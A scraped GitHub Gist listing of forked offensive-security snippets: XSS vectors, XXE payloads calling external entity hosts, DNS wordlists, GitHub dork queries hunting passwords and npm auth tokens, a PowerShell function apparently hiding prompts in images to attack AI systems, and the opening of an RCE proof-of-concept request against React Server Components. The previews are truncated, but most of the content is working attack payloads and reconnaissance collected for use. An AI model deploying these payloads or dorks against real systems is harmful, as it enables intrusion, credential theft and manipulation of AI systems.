Marco 'Tr0p' Tolosa marcostolosa

@marcostolosa
marcostolosa / google-dorks
Created December 20, 2025 00:17 — forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@marcostolosa
marcostolosa / xss_vectors.txt
Created December 20, 2025 00:13 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@marcostolosa
marcostolosa / all.txt
Created December 20, 2025 00:12 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@marcostolosa
marcostolosa / XXE_payloads
Created December 20, 2025 00:10 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@marcostolosa
marcostolosa / active_nasa_subdomains.txt
Created December 14, 2025 02:48 — forked from Sneezy123/active_nasa_subdomains.txt
Active NASA subdomains (found with subfinder and assetfinder | checked with httpx) 968 Total
echo ""
echo "************ Github Dork Links (must be logged in) *******************"
echo ""
echo " password"
echo "https://github.com/search?q="hackertarget.site"+password&type=Code"
echo "https://github.com/search?q=""hackertarget""+password&type=Code"
echo ""
echo " npmrc _auth"
@marcostolosa
marcostolosa / xxe-payloads.txt
Created December 11, 2025 18:24 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@marcostolosa
marcostolosa / hackerone-initiate-programs.sh
Created December 11, 2025 18:23 — forked from honoki/hackerone-initiate-programs.sh
Create new BBRF programs from your private and public HackerOne programs.
#!/bin/bash
# Initiate new BBRF programs from your public and private HackerOne programs
h1name="<your-hackerone-username>"
apitoken="<your-hackerone-api-token>"
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100'
while [ "$next" ]; do
function Invoke-AIPromptStego {
param(
[string]$InFile,
[string]$OutFile,
[string]$OutFormat,
[string]$Prompt
)
Add-Type -AssemblyName System.Drawing
@marcostolosa
marcostolosa / CVE-2025-55182.http
Created December 5, 2025 22:27 — forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"